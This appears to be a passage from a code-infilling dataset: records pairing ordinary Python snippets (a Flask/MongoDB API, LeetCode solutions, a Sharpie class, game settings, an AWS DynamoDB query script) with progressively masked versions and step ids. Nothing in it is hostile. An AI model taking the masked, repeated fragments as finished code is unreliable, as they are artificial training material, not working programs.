jsonify({\"neutral\": cursor[0]['neutral'], \"negative\": cursor[0]['negative'], \"positive\": cursor[0]['positive']})\n\n\n@app.route('/mongodb/politics')\n@cross_origin()\ndef getPolitics():\n cursor = db.politics.find().skip(db.politics.count_documents({}) - 1)\n return jsonify({\"neutral\": cursor[0]['neutral'], \"negative\": cursor[0]['negative'], \"positive\": cursor[0]['positive']})\n\n@app.route('/visualisation/clusteringAge')\n@cross_origin()\ndef getClusteringAge():\n app.config[\"MONGO_URI\"] = \"mongodb://localhost:27017/ClusteringDB\"\n mongo = PyMongo(app)\n db = mongo.db\n array = db.clusteringAge.find().skip(db.clusteringAge.count_documents({}) - 1)\n return jsonify({\"countries\": array[0]['countries'], \"x\": array[0]['x'],\"y\":array[0]['y'], \"cluster\": array[0]['cluster']})\n\n\n@app.route('/visualisation/clusteringTest')\n@cross_origin()\ndef getClusteringTest():\n app.config[\"MONGO_URI\"] = \"mongodb://localhost:27017/ClusteringDB\"\n mongo = PyMongo(app)\n db = mongo.db\n array = db.clusteringTest.find().skip(db.clusteringTest.count_documents({}) - 1)\n return jsonify(\n {\"countries\": array[0]['countries'], \"x\": array[0]['x'], \"y\": array[0]['y'], \"cluster\": array[0]['cluster']})\n\nif __name__ == \"__main__\":\n app.run(debug=True)",
"step-ids": [
17,
18,
19,
21,
22
]
}
|
[
17,
18,
19,
21,
22
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Solution(object):
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Solution(object):
def maxSubArrayLen(self, nums, k):
"""
:type nums: List[int]
:type k: int
:rtype: int
"""
sums = [0] * (len(nums) + 1)
seen = {}
seen[0] = -1
res = 0
for idx, n in enumerate(nums):
sums[idx + 1] = sums[idx] + n
if sums[idx + 1] - k in seen:
res = max(res, idx - seen[sums[idx + 1] - k])
if sums[idx + 1] not in seen:
seen[sums[idx + 1]] = idx
return res
|
flexible
|
{
"blob_id": "1ccaedb6e79101764db1907634ba627a0f9f2bb2",
"index": 5500,
"step-1": "<mask token>\n",
"step-2": "class Solution(object):\n <mask token>\n",
"step-3": "class Solution(object):\n\n def maxSubArrayLen(self, nums, k):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :rtype: int\n \"\"\"\n sums = [0] * (len(nums) + 1)\n seen = {}\n seen[0] = -1\n res = 0\n for idx, n in enumerate(nums):\n sums[idx + 1] = sums[idx] + n\n if sums[idx + 1] - k in seen:\n res = max(res, idx - seen[sums[idx + 1] - k])\n if sums[idx + 1] not in seen:\n seen[sums[idx + 1]] = idx\n return res\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
class Solution:
def lcaDeepestLeaves(self, root: TreeNode) ->TreeNode:
_, lca = self.get_lca(root, 0)
return lca
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TreeNode:
<|reserved_special_token_0|>
class Solution:
def lcaDeepestLeaves(self, root: TreeNode) ->TreeNode:
_, lca = self.get_lca(root, 0)
return lca
def get_lca(self, node: TreeNode, depth: int) ->Tuple[int, TreeNode]:
if not node:
return depth, node
left_depth, left_lca = self.get_lca(node.left, depth + 1)
right_depth, right_lca = self.get_lca(node.right, depth + 1)
if left_depth == right_depth:
return left_depth, node
if left_depth > right_depth:
return left_depth, left_lca
return right_depth, right_lca
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def lcaDeepestLeaves(self, root: TreeNode) ->TreeNode:
_, lca = self.get_lca(root, 0)
return lca
def get_lca(self, node: TreeNode, depth: int) ->Tuple[int, TreeNode]:
if not node:
return depth, node
left_depth, left_lca = self.get_lca(node.left, depth + 1)
right_depth, right_lca = self.get_lca(node.right, depth + 1)
if left_depth == right_depth:
return left_depth, node
if left_depth > right_depth:
return left_depth, left_lca
return right_depth, right_lca
<|reserved_special_token_1|>
from typing import Tuple
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def lcaDeepestLeaves(self, root: TreeNode) ->TreeNode:
_, lca = self.get_lca(root, 0)
return lca
def get_lca(self, node: TreeNode, depth: int) ->Tuple[int, TreeNode]:
if not node:
return depth, node
left_depth, left_lca = self.get_lca(node.left, depth + 1)
right_depth, right_lca = self.get_lca(node.right, depth + 1)
if left_depth == right_depth:
return left_depth, node
if left_depth > right_depth:
return left_depth, left_lca
return right_depth, right_lca
|
flexible
|
{
"blob_id": "0a528fb7fe4a318af8bd3111e8d67f6af6bd7416",
"index": 304,
"step-1": "<mask token>\n\n\nclass Solution:\n\n def lcaDeepestLeaves(self, root: TreeNode) ->TreeNode:\n _, lca = self.get_lca(root, 0)\n return lca\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass TreeNode:\n <mask token>\n\n\nclass Solution:\n\n def lcaDeepestLeaves(self, root: TreeNode) ->TreeNode:\n _, lca = self.get_lca(root, 0)\n return lca\n\n def get_lca(self, node: TreeNode, depth: int) ->Tuple[int, TreeNode]:\n if not node:\n return depth, node\n left_depth, left_lca = self.get_lca(node.left, depth + 1)\n right_depth, right_lca = self.get_lca(node.right, depth + 1)\n if left_depth == right_depth:\n return left_depth, node\n if left_depth > right_depth:\n return left_depth, left_lca\n return right_depth, right_lca\n",
"step-3": "<mask token>\n\n\nclass TreeNode:\n\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution:\n\n def lcaDeepestLeaves(self, root: TreeNode) ->TreeNode:\n _, lca = self.get_lca(root, 0)\n return lca\n\n def get_lca(self, node: TreeNode, depth: int) ->Tuple[int, TreeNode]:\n if not node:\n return depth, node\n left_depth, left_lca = self.get_lca(node.left, depth + 1)\n right_depth, right_lca = self.get_lca(node.right, depth + 1)\n if left_depth == right_depth:\n return left_depth, node\n if left_depth > right_depth:\n return left_depth, left_lca\n return right_depth, right_lca\n",
"step-4": "from typing import Tuple\n\n\nclass TreeNode:\n\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution:\n\n def lcaDeepestLeaves(self, root: TreeNode) ->TreeNode:\n _, lca = self.get_lca(root, 0)\n return lca\n\n def get_lca(self, node: TreeNode, depth: int) ->Tuple[int, TreeNode]:\n if not node:\n return depth, node\n left_depth, left_lca = self.get_lca(node.left, depth + 1)\n right_depth, right_lca = self.get_lca(node.right, depth + 1)\n if left_depth == right_depth:\n return left_depth, node\n if left_depth > right_depth:\n return left_depth, left_lca\n return right_depth, right_lca\n",
"step-5": null,
"step-ids": [
2,
4,
5,
6
]
}
|
[
2,
4,
5,
6
] |
<|reserved_special_token_0|>
class SharpieSet:
<|reserved_special_token_0|>
def add_sharpie(self, sharpie: Sharpie):
self.sharpies.append(sharpie)
<|reserved_special_token_0|>
def remove_unusable(self):
for i in self.sharpies:
if i.ink_amount <= 0:
self.sharpies.remove(i)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class SharpieSet:
def __init__(self):
self.sharpies = []
self.usable_sharpies = []
self.usable_sharpies_count = 0
def add_sharpie(self, sharpie: Sharpie):
self.sharpies.append(sharpie)
<|reserved_special_token_0|>
def remove_unusable(self):
for i in self.sharpies:
if i.ink_amount <= 0:
self.sharpies.remove(i)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class SharpieSet:
def __init__(self):
self.sharpies = []
self.usable_sharpies = []
self.usable_sharpies_count = 0
def add_sharpie(self, sharpie: Sharpie):
self.sharpies.append(sharpie)
def count_usable(self):
for i in self.sharpies:
if i.ink_amount > 0:
self.usable_sharpies.append(i)
self.usable_sharpies_count += 1
def remove_unusable(self):
for i in self.sharpies:
if i.ink_amount <= 0:
self.sharpies.remove(i)
<|reserved_special_token_1|>
from sharpie import Sharpie
class SharpieSet:
def __init__(self):
self.sharpies = []
self.usable_sharpies = []
self.usable_sharpies_count = 0
def add_sharpie(self, sharpie: Sharpie):
self.sharpies.append(sharpie)
def count_usable(self):
for i in self.sharpies:
if i.ink_amount > 0:
self.usable_sharpies.append(i)
self.usable_sharpies_count += 1
def remove_unusable(self):
for i in self.sharpies:
if i.ink_amount <= 0:
self.sharpies.remove(i)
<|reserved_special_token_1|>
from sharpie import Sharpie
class SharpieSet():
def __init__(self):
self.sharpies = []
self.usable_sharpies = []
self.usable_sharpies_count = 0
def add_sharpie(self, sharpie: Sharpie):
self.sharpies.append(sharpie)
def count_usable(self):
for i in self.sharpies:
if (i.ink_amount > 0):
self.usable_sharpies.append(i)
self.usable_sharpies_count += 1
def remove_unusable(self):
for i in self.sharpies:
if (i.ink_amount <= 0):
self.sharpies.remove(i)
|
flexible
|
{
"blob_id": "4524dd5f5cddd475ca39fea7ec94fa3c1df6bd2e",
"index": 3268,
"step-1": "<mask token>\n\n\nclass SharpieSet:\n <mask token>\n\n def add_sharpie(self, sharpie: Sharpie):\n self.sharpies.append(sharpie)\n <mask token>\n\n def remove_unusable(self):\n for i in self.sharpies:\n if i.ink_amount <= 0:\n self.sharpies.remove(i)\n",
"step-2": "<mask token>\n\n\nclass SharpieSet:\n\n def __init__(self):\n self.sharpies = []\n self.usable_sharpies = []\n self.usable_sharpies_count = 0\n\n def add_sharpie(self, sharpie: Sharpie):\n self.sharpies.append(sharpie)\n <mask token>\n\n def remove_unusable(self):\n for i in self.sharpies:\n if i.ink_amount <= 0:\n self.sharpies.remove(i)\n",
"step-3": "<mask token>\n\n\nclass SharpieSet:\n\n def __init__(self):\n self.sharpies = []\n self.usable_sharpies = []\n self.usable_sharpies_count = 0\n\n def add_sharpie(self, sharpie: Sharpie):\n self.sharpies.append(sharpie)\n\n def count_usable(self):\n for i in self.sharpies:\n if i.ink_amount > 0:\n self.usable_sharpies.append(i)\n self.usable_sharpies_count += 1\n\n def remove_unusable(self):\n for i in self.sharpies:\n if i.ink_amount <= 0:\n self.sharpies.remove(i)\n",
"step-4": "from sharpie import Sharpie\n\n\nclass SharpieSet:\n\n def __init__(self):\n self.sharpies = []\n self.usable_sharpies = []\n self.usable_sharpies_count = 0\n\n def add_sharpie(self, sharpie: Sharpie):\n self.sharpies.append(sharpie)\n\n def count_usable(self):\n for i in self.sharpies:\n if i.ink_amount > 0:\n self.usable_sharpies.append(i)\n self.usable_sharpies_count += 1\n\n def remove_unusable(self):\n for i in self.sharpies:\n if i.ink_amount <= 0:\n self.sharpies.remove(i)\n",
"step-5": "from sharpie import Sharpie\n\n\nclass SharpieSet():\n def __init__(self):\n self.sharpies = []\n self.usable_sharpies = []\n self.usable_sharpies_count = 0\n\n def add_sharpie(self, sharpie: Sharpie):\n self.sharpies.append(sharpie)\n\n def count_usable(self):\n for i in self.sharpies:\n if (i.ink_amount > 0):\n self.usable_sharpies.append(i)\n self.usable_sharpies_count += 1\n\n def remove_unusable(self):\n for i in self.sharpies:\n if (i.ink_amount <= 0):\n self.sharpies.remove(i)\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
FONTS_PATH = 'media/battle_font.ttf'
LEVELS_PATH = 'media/levels'
GAME_MUSIC_PATH = 'media/sounds/DOOM.ogg'
MENU_MUSIC_PATH = 'media/sounds/ANewMorning.ogg'
FONT_SIZE = 30
CELL_WIDTH = 13 * 2
CELL_HEIGHT = 13 * 2
CELL_SIZE = CELL_WIDTH, CELL_HEIGHT
FPS = 30
DISPLAY_WIDTH = CELL_WIDTH * 30
DISPLAY_HEIGHT = CELL_HEIGHT * 30
DISPLAY_SIZE = DISPLAY_WIDTH, DISPLAY_HEIGHT
RESPAWN_TIME = 64
<|reserved_special_token_1|>
# Main Parameters
FONTS_PATH = "media/battle_font.ttf"
LEVELS_PATH = "media/levels"
GAME_MUSIC_PATH = "media/sounds/DOOM.ogg"
MENU_MUSIC_PATH = "media/sounds/ANewMorning.ogg"
# GAME Parameters
FONT_SIZE = 30
CELL_WIDTH = 13 * 2
CELL_HEIGHT = 13 * 2
CELL_SIZE = (CELL_WIDTH, CELL_HEIGHT)
FPS = 30
DISPLAY_WIDTH = CELL_WIDTH * 30
DISPLAY_HEIGHT = CELL_HEIGHT * 30
DISPLAY_SIZE = (DISPLAY_WIDTH, DISPLAY_HEIGHT)
RESPAWN_TIME = 64
|
flexible
|
{
"blob_id": "513d7e3c34cc9da030e2e018ad2db6972cf440dc",
"index": 5100,
"step-1": "<mask token>\n",
"step-2": "FONTS_PATH = 'media/battle_font.ttf'\nLEVELS_PATH = 'media/levels'\nGAME_MUSIC_PATH = 'media/sounds/DOOM.ogg'\nMENU_MUSIC_PATH = 'media/sounds/ANewMorning.ogg'\nFONT_SIZE = 30\nCELL_WIDTH = 13 * 2\nCELL_HEIGHT = 13 * 2\nCELL_SIZE = CELL_WIDTH, CELL_HEIGHT\nFPS = 30\nDISPLAY_WIDTH = CELL_WIDTH * 30\nDISPLAY_HEIGHT = CELL_HEIGHT * 30\nDISPLAY_SIZE = DISPLAY_WIDTH, DISPLAY_HEIGHT\nRESPAWN_TIME = 64\n",
"step-3": "# Main Parameters\nFONTS_PATH = \"media/battle_font.ttf\"\nLEVELS_PATH = \"media/levels\"\nGAME_MUSIC_PATH = \"media/sounds/DOOM.ogg\"\nMENU_MUSIC_PATH = \"media/sounds/ANewMorning.ogg\"\n\n# GAME Parameters\nFONT_SIZE = 30\nCELL_WIDTH = 13 * 2\nCELL_HEIGHT = 13 * 2\nCELL_SIZE = (CELL_WIDTH, CELL_HEIGHT)\nFPS = 30\nDISPLAY_WIDTH = CELL_WIDTH * 30\nDISPLAY_HEIGHT = CELL_HEIGHT * 30\nDISPLAY_SIZE = (DISPLAY_WIDTH, DISPLAY_HEIGHT)\nRESPAWN_TIME = 64\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
from neodroidagent.entry_points.agent_tests import sac_gym_test
if __name__ == "__main__":
sac_gym_test()
|
normal
|
{
"blob_id": "e9890fcf9ad2a78b3400f6e4eeb75deac8edcd6a",
"index": 1609,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n sac_gym_test()\n",
"step-3": "from neodroidagent.entry_points.agent_tests import sac_gym_test\nif __name__ == '__main__':\n sac_gym_test()\n",
"step-4": "from neodroidagent.entry_points.agent_tests import sac_gym_test\n\nif __name__ == \"__main__\":\n sac_gym_test()\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#!/usr/bin/env python
'''
@author : Mitchell Van Braeckel
@id : 1002297
@date : 10/10/2020
@version : python 3.8-32 / python 3.8.5
@course : CIS*4010 Cloud Computing
@brief : A1 Part 2 - AWS DynamoDB ; Q2 - Query OECD
@note :
Description: There are many CSV files containing info from the OECD about agricultural production, each for various regions around the world.
Queries all 4 tables (northamerica, canada, usa, mexico -table names) based on a commodity (code key or label),
looking for all common variables between CAN, USA, and MEX, outputting all results (for all years) in a table,
then output the specific NA definition 'hit' results and probable conclusion for NA definition per variable,
as well as an overall conclusion for NA definition
NOTE: forgot to add ability to specify commodity as cmd line arg instead of STDIN
NOTE: assume year range is 2010 to 2029 (inclusive)
NOTE: assume perfect user input for commodity and variables
- however, if input commodity that's not a valid commodity code or label, exits program with error message
NOTE: NA definition hit refers to if the calculated sum from different tables of CAN, USA, MEX are equal to that of NA (CAN+USA, CAN+USA+MEX, or Neither)
'''
'''
IMPROVEMENT: Use 'encodings' table instead of the CSV file
'''
############################################# IMPORTS #############################################
# IMPORTS - 'pip install <import-package>'
import boto3
import csv
import sys
from boto3.dynamodb.conditions import Key, Attr
############################################ CONSTANTS ############################################
# TABLE CONSTANTS
NORTH_AMERICA = "northamerica"
CANADA = "canada"
USA = "usa"
MEXICO = "mexico"
TABLE_LIST = [NORTH_AMERICA, CANADA, USA, MEXICO]
YEAR_RANGE = range(2010, 2030)
# OTHER CONSTANTS
OUTPUT_FORMAT = "{:<8}{:<18}{:<18}{:<18}{:<18}{:<18}{:<18}{:<10}"
ENCODINGS_CSV = "encodings.csv"
#ENCODINGS_TABLE_NAME = "encodings"
USAGE_STATEMENT = "Usage: py queryOECD.py <commodity-code|commodity-label>"
############################## STATE VARIABLES, INITIALIZATION, MAIN ##############################
# MAIN - Declares global vars and state here, then ask for commodity (check both key/label),
# look for all common variables between CAN, USA, and MEX, outputting all results (for all years) in a table,
# then output the specific NA definition 'hit' results and probable conclusion for NA definition
def main():
#globals
global dynamodb_client
global dynamodb_resource
global na_table
global canada_table
global usa_table
global mexico_table
global total_can_usa
global total_can_usa_mex
global total_neither
# ========== ARGUMENTS ==========
# Collect command line arguments when executing this python script
argc = len(sys.argv)
bad_usage_flag = False
# Check #of args (deal with it later tho)
# 1 optional arg for commodity, otherwise prompt user for it
if argc > 2:
bad_usage_flag = True
print("Error: Too many arguments.")
# Exit with usage statement if flag has been triggered for any reason
if bad_usage_flag:
sys.exit(USAGE_STATEMENT)
# ========== AWS DYNAMO DB ==========
# Init AWS DynamoDB client and resource (NOTE: these are global)
dynamodb_client = boto3.client("dynamodb")
dynamodb_resource = boto3.resource("dynamodb")
# Validate AWS DynamoDB credentials (by testing if 'list_tables()' works)
try:
dynamodb_client.list_tables()
except Exception as e:
print("Error: Invalid or expired credentials (or insufficient permissions to call 'list_tables()')")
sys.exit(f"[ERROR] {e}")
# Check the 4 tables exist, then get them all
err_output = ""
table_list = dynamodb_client.list_tables()['TableNames']
print(f"Existing Tables: {table_list}")
for t in TABLE_LIST:
if t not in table_list:
err_output += f"Error: Invalid table name '{t}' - table does not exist.\n"
# Print all tables that did not exist, then exit
if err_output != "":
print(err_output.strip("\n"))
sys.exit("ERROR: Terminating program because unable to get table that does not exist.")
# Get all tables (after checking they exist) (NOTE: these are global)
na_table = dynamodb_resource.Table(NORTH_AMERICA)
canada_table = dynamodb_resource.Table(CANADA)
usa_table = dynamodb_resource.Table(USA)
mexico_table = dynamodb_resource.Table(MEXICO)
# Open the encodings CSV file and read its contents
commodity_encodings_dict = {}
variable_encodings_dict = {}
with open(ENCODINGS_CSV, "r", newline='') as csv_file:
csv_content = csv.reader(csv_file, delimiter=',')
# if field is var or commodity, set a key-value pair between code and label (in the respective map)
for row in csv_content:
if row[2] == "variable":
variable_encodings_dict[row[0]] = row[1]
elif row[2] == "commodity":
commodity_encodings_dict[row[0]] = row[1]
csv_file.close()
# Check args for commodity now, otherwise prompt user
if argc == 2:
commodity_input = sys.argv[1]
else:
# Ask user for commodity
commodity_input = input("Commodity: ").strip()
# Check if input exists as code key, otherwise try to convert assumed label to code key (if not a label, code will be None after)
if commodity_input.upper() in commodity_encodings_dict:
commodity_code = commodity_input.upper()
else:
commodity_code = convert_dict_label_to_code_key(commodity_input, commodity_encodings_dict)
# Check if commodity found a code or None
print(f"ENCODING: {commodity_code}")
if commodity_code is None:
print(f"Error: Commodity '{commodity_input}' was not found.")
sys.exit("ERROR: Terminating program because input does not exist as an encoding commodity code or label.")
# Init total accumulators for each category
total_can_usa = 0
total_can_usa_mex = 0
total_neither = 0
# iterate through each variable and analyze data (if applicable)
for var in variable_encodings_dict.keys():
if is_common_variable(commodity_code, var):
output_table(commodity_code, var, variable_encodings_dict, commodity_encodings_dict)
# Determine the NA definition for this variable based on #of 'hits' per year
max_hits = max(total_can_usa, total_can_usa_mex, total_neither)
if total_can_usa == max_hits:
na_defn = "CAN+USA"
elif total_can_usa_mex == max_hits:
na_defn = "CAN+USA+MEX"
else:
na_defn = "Neither"
print(f"Overall North America Definition Results: {total_can_usa} CAN+USA, {total_can_usa_mex} CAN+USA+MEX, {total_neither} Neither")
print(f"Conclusion for all {commodity_encodings_dict[commodity_code]} variables = {na_defn}\n")
############################################ FUNCTIONS ############################################
# Converts the label of a dict into its code key, returns None if not a label
def convert_dict_label_to_code_key(label, encodings_dict):
# Get the key of the label if the label exists in the dict as a value
if label in list(encodings_dict.values()):
return list(encodings_dict.keys())[list(encodings_dict.values()).index(label)]
else:
return None
# Check if a commodity code + variable is common across all 4 tables, return true if it is
def is_common_variable(commodity_code, variable):
return (has_commodity_and_variable(na_table, commodity_code, variable) and
has_commodity_and_variable(canada_table, commodity_code, variable) and
has_commodity_and_variable(usa_table, commodity_code, variable) and
has_commodity_and_variable(mexico_table, commodity_code, variable))
# Check if a table has data for commodity code + variable (ie. scan table), returns true if at least 1 item is found
def has_commodity_and_variable(table, commodity_code, variable):
response = table.scan(
FilterExpression = Attr('commodity').eq(commodity_code) & Attr('variable').eq(variable)
)
return response['Count'] > 0
# Retrieves and outputs table data based on commodity and variable and analyze for NA definition
def output_table(commodity_code, variable, variable_encodings_dict, commodity_encodings_dict):
# Bring in globals to modify
global total_can_usa
global total_can_usa_mex
global total_neither
# Init local accumulators
temp_can_usa = 0
temp_can_usa_mex = 0
temp_neither = 0
# Print table headers: common variable (for commodity code) across all 4 tables, and table column names
print(f"Variable: {variable_encodings_dict[variable]}")
print(OUTPUT_FORMAT.format("Year", "North America", "Canada", "USA", "Mexico", "CAN+USA", "CAN+USA+MEX", "NA Defn"))
# Retrieve all data, from all years (ie. the items from the scan)
na_scan_data = na_table.scan(
FilterExpression=Attr('commodity').eq(commodity_code) & Attr('variable').eq(variable)
)['Items']
can_scan_data = canada_table.scan(
FilterExpression=Attr('commodity').eq(commodity_code) & Attr('variable').eq(variable)
)['Items']
usa_scan_data = usa_table.scan(
FilterExpression=Attr('commodity').eq(commodity_code) & Attr('variable').eq(variable)
)['Items']
mex_scan_data = mexico_table.scan(
FilterExpression=Attr('commodity').eq(commodity_code) & Attr('variable').eq(variable)
)['Items']
# Sort each scan data by key
na_scan_data.sort(key=data_sort)
can_scan_data.sort(key=data_sort)
usa_scan_data.sort(key=data_sort)
mex_scan_data.sort(key=data_sort)
# Analyze data
for year in YEAR_RANGE:
# For each relevant year, calculate total value using multiplication factor
i = year - 2010
na_value = na_scan_data[i]['value'] * (10**na_scan_data[i]['mfactor'])
can_value = can_scan_data[i]['value'] * (10**can_scan_data[i]['mfactor'])
usa_value = usa_scan_data[i]['value'] * (10**usa_scan_data[i]['mfactor'])
mex_value = mex_scan_data[i]['value'] * (10**mex_scan_data[i]['mfactor'])
# Calc temp sums for the CAN+USA and CAN+USA+MEX columns
temp_can_usa_value = can_value + usa_value
temp_can_usa_mex_value = can_value + usa_value + mex_value
# Determine OECD def of NA, by checking if the temp calc sums from scan data calc values are equivalent to CAN+USA sum, CAN+USA+MEX sum, or Neither
# Note: accumulate the #of accurate NA def 'hits'
if temp_can_usa_value == na_value:
na_defn = 'CAN+USA'
temp_can_usa += 1
elif temp_can_usa_mex_value == na_value:
na_defn = 'CAN+USA+MEX'
temp_can_usa_mex += 1
else:
na_defn = 'Neither'
temp_neither += 1
# Print table row for current year
print(OUTPUT_FORMAT.format(year, na_value, can_value, usa_value, mex_value, temp_can_usa_value, temp_can_usa_mex_value, na_defn))
# Determine the NA definition for this variable based on #of 'hits' per year
max_hits = max(temp_can_usa, temp_can_usa_mex, temp_neither)
if temp_can_usa == max_hits:
na_defn = "CAN+USA"
elif temp_can_usa_mex == max_hits:
na_defn = "CAN+USA+MEX"
else:
na_defn = "Neither"
print(f"North America Definition Results: {temp_can_usa} CAN+USA, {temp_can_usa_mex} CAN+USA+MEX, {temp_neither} Neither")
print(f"Therefore we can conclude North America = {na_defn}\n")
# Accumulate global totals using temp local accumulators for NA definition 'hits'
total_can_usa += temp_can_usa
total_can_usa_mex += temp_can_usa_mex
total_neither += temp_neither
# Sorter Helper for queried data by year
def data_sort(elem):
    """Sort key for scanned DynamoDB items: order records chronologically by 'year'."""
    return elem["year"]
###################################################################################################
# Script entry point. Guarded so that importing this module (e.g. for reuse of data_sort or
# output_table in another tool, or for unit testing) does not immediately kick off AWS DynamoDB
# scans and interactive prompts — main() only runs when the file is executed directly.
if __name__ == "__main__":
    main()
|
normal
|
{
"blob_id": "05186093820dffd047b0e7b5a69eb33f94f78b80",
"index": 6787,
"step-1": "<mask token>\n\n\ndef main():\n global dynamodb_client\n global dynamodb_resource\n global na_table\n global canada_table\n global usa_table\n global mexico_table\n global total_can_usa\n global total_can_usa_mex\n global total_neither\n argc = len(sys.argv)\n bad_usage_flag = False\n if argc > 2:\n bad_usage_flag = True\n print('Error: Too many arguments.')\n if bad_usage_flag:\n sys.exit(USAGE_STATEMENT)\n dynamodb_client = boto3.client('dynamodb')\n dynamodb_resource = boto3.resource('dynamodb')\n try:\n dynamodb_client.list_tables()\n except Exception as e:\n print(\n \"Error: Invalid or expired credentials (or insufficient permissions to call 'list_tables()')\"\n )\n sys.exit(f'[ERROR] {e}')\n err_output = ''\n table_list = dynamodb_client.list_tables()['TableNames']\n print(f'Existing Tables: {table_list}')\n for t in TABLE_LIST:\n if t not in table_list:\n err_output += (\n f\"Error: Invalid table name '{t}' - table does not exist.\\n\")\n if err_output != '':\n print(err_output.strip('\\n'))\n sys.exit(\n 'ERROR: Terminating program because unable to get table that does not exist.'\n )\n na_table = dynamodb_resource.Table(NORTH_AMERICA)\n canada_table = dynamodb_resource.Table(CANADA)\n usa_table = dynamodb_resource.Table(USA)\n mexico_table = dynamodb_resource.Table(MEXICO)\n commodity_encodings_dict = {}\n variable_encodings_dict = {}\n with open(ENCODINGS_CSV, 'r', newline='') as csv_file:\n csv_content = csv.reader(csv_file, delimiter=',')\n for row in csv_content:\n if row[2] == 'variable':\n variable_encodings_dict[row[0]] = row[1]\n elif row[2] == 'commodity':\n commodity_encodings_dict[row[0]] = row[1]\n csv_file.close()\n if argc == 2:\n commodity_input = sys.argv[1]\n else:\n commodity_input = input('Commodity: ').strip()\n if commodity_input.upper() in commodity_encodings_dict:\n commodity_code = commodity_input.upper()\n else:\n commodity_code = convert_dict_label_to_code_key(commodity_input,\n commodity_encodings_dict)\n 
print(f'ENCODING: {commodity_code}')\n if commodity_code is None:\n print(f\"Error: Commodity '{commodity_input}' was not found.\")\n sys.exit(\n 'ERROR: Terminating program because input does not exist as an encoding commodity code or label.'\n )\n total_can_usa = 0\n total_can_usa_mex = 0\n total_neither = 0\n for var in variable_encodings_dict.keys():\n if is_common_variable(commodity_code, var):\n output_table(commodity_code, var, variable_encodings_dict,\n commodity_encodings_dict)\n max_hits = max(total_can_usa, total_can_usa_mex, total_neither)\n if total_can_usa == max_hits:\n na_defn = 'CAN+USA'\n elif total_can_usa_mex == max_hits:\n na_defn = 'CAN+USA+MEX'\n else:\n na_defn = 'Neither'\n print(\n f'Overall North America Definition Results: {total_can_usa} CAN+USA, {total_can_usa_mex} CAN+USA+MEX, {total_neither} Neither'\n )\n print(\n f'Conclusion for all {commodity_encodings_dict[commodity_code]} variables = {na_defn}\\n'\n )\n\n\ndef convert_dict_label_to_code_key(label, encodings_dict):\n if label in list(encodings_dict.values()):\n return list(encodings_dict.keys())[list(encodings_dict.values()).\n index(label)]\n else:\n return None\n\n\n<mask token>\n\n\ndef has_commodity_and_variable(table, commodity_code, variable):\n response = table.scan(FilterExpression=Attr('commodity').eq(\n commodity_code) & Attr('variable').eq(variable))\n return response['Count'] > 0\n\n\ndef output_table(commodity_code, variable, variable_encodings_dict,\n commodity_encodings_dict):\n global total_can_usa\n global total_can_usa_mex\n global total_neither\n temp_can_usa = 0\n temp_can_usa_mex = 0\n temp_neither = 0\n print(f'Variable: {variable_encodings_dict[variable]}')\n print(OUTPUT_FORMAT.format('Year', 'North America', 'Canada', 'USA',\n 'Mexico', 'CAN+USA', 'CAN+USA+MEX', 'NA Defn'))\n na_scan_data = na_table.scan(FilterExpression=Attr('commodity').eq(\n commodity_code) & Attr('variable').eq(variable))['Items']\n can_scan_data = 
canada_table.scan(FilterExpression=Attr('commodity').eq\n (commodity_code) & Attr('variable').eq(variable))['Items']\n usa_scan_data = usa_table.scan(FilterExpression=Attr('commodity').eq(\n commodity_code) & Attr('variable').eq(variable))['Items']\n mex_scan_data = mexico_table.scan(FilterExpression=Attr('commodity').eq\n (commodity_code) & Attr('variable').eq(variable))['Items']\n na_scan_data.sort(key=data_sort)\n can_scan_data.sort(key=data_sort)\n usa_scan_data.sort(key=data_sort)\n mex_scan_data.sort(key=data_sort)\n for year in YEAR_RANGE:\n i = year - 2010\n na_value = na_scan_data[i]['value'] * 10 ** na_scan_data[i]['mfactor']\n can_value = can_scan_data[i]['value'] * 10 ** can_scan_data[i][\n 'mfactor']\n usa_value = usa_scan_data[i]['value'] * 10 ** usa_scan_data[i][\n 'mfactor']\n mex_value = mex_scan_data[i]['value'] * 10 ** mex_scan_data[i][\n 'mfactor']\n temp_can_usa_value = can_value + usa_value\n temp_can_usa_mex_value = can_value + usa_value + mex_value\n if temp_can_usa_value == na_value:\n na_defn = 'CAN+USA'\n temp_can_usa += 1\n elif temp_can_usa_mex_value == na_value:\n na_defn = 'CAN+USA+MEX'\n temp_can_usa_mex += 1\n else:\n na_defn = 'Neither'\n temp_neither += 1\n print(OUTPUT_FORMAT.format(year, na_value, can_value, usa_value,\n mex_value, temp_can_usa_value, temp_can_usa_mex_value, na_defn))\n max_hits = max(temp_can_usa, temp_can_usa_mex, temp_neither)\n if temp_can_usa == max_hits:\n na_defn = 'CAN+USA'\n elif temp_can_usa_mex == max_hits:\n na_defn = 'CAN+USA+MEX'\n else:\n na_defn = 'Neither'\n print(\n f'North America Definition Results: {temp_can_usa} CAN+USA, {temp_can_usa_mex} CAN+USA+MEX, {temp_neither} Neither'\n )\n print(f'Therefore we can conclude North America = {na_defn}\\n')\n total_can_usa += temp_can_usa\n total_can_usa_mex += temp_can_usa_mex\n total_neither += temp_neither\n\n\ndef data_sort(elem):\n return elem['year']\n\n\n<mask token>\n",
